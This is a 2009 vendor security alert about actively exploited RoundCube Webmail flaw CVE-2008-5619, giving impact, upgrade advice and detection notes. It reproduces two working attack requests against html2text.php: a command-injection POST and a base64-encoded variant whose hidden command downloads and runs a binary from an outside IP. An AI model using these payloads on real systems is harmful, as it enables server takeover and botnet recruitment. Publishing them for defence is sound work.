RoundCube Webmail Vulnerabilities Being Targeted

Friday, March 27, 2009


Priority: MEDIUM

Impact: Potential for system compromise or site being used as attack launchpoint.

Resolution: Upgrade to the latest version of RoundCube Webmail
Verify software version and blocking policy in Breach appliance.

Who: Any organization using older versions of the RoundCube Webmail application may be vulnerable.

What: The preg_replace function in the html2text.php page of RoundCube Webmail does not properly process data that uses the eval switch.  The vulnerability allows remote clients to execute arbitrary code.  The vulnerability is being tracked by CVE 2008-5619.

How: Breach Security Labs has been monitoring data posted at the SANS Internet Storm Center (ISC) and correlating it with data gathered at Breach Security customer sites, and we have identified the following real attack vectors targeting this vulnerability.

  1. Standard Attack Payload

    This example is taken from the RoundCube Issues Ticket site - http://trac.roundcube.net/ticket/1485618.  In the payload, the attacker is sending PHP system commands in the post payload.  The result is that if the attack was successful, the attacker would identify OS information. 

      POST /rc/bin/html2text.php HTTP/1.1
      Host: www.example.com
      Pragma: no-cache
      Accept: */*
      Content-Type: ''
      Connection: Keep-Alive
      Content-Length: 28

      <b>{${system(uname -a)}}</b>

  1. Use of Base64_Decode Evasion

    The following example was identified both at the SANS ISC and from Breach customer traffic.  In order to bypass basic negative security filters looking for specific OS command injection payloads, this attack variant is placing the Bas364 Encoded command payload in the Accept Request header and using the “EVAL(BASE64_DECODE) function to decode the payload. 

      POST /roundcube/bin/html2text.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
      Host: www.example.com
      Accept: cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt
      4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7
      Content-Length: 54

      <b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>

Impact: The impact of a successful compromise is severe as it can result in the web server becoming part of a Botnet.  The decoded value of the Accept header data is: 

These command attempt to have the web server download exploit toolkit code.   

Risk: Factoring in the fact that this vulnerability is actively being targeted and there is an update available, the severity for web sites is MEDIUM.  If an upgrade/patch was not available, this would have been rated higher.

Resolution:
Update the RoundCube Webmail software
Install the latest version or apply the security patch listed here.

Verify the version and blocking policy in the Breach appliance
WebDefend 3.5 collaborative attack detection capabilities are able to identify this type of attack in multiple ways including the PHP Base64_Decode obfuscation/evasion technique.

Contact:
 For more information on this alert and other web application security news, please visit Breach Security Labs or email support@breach.com.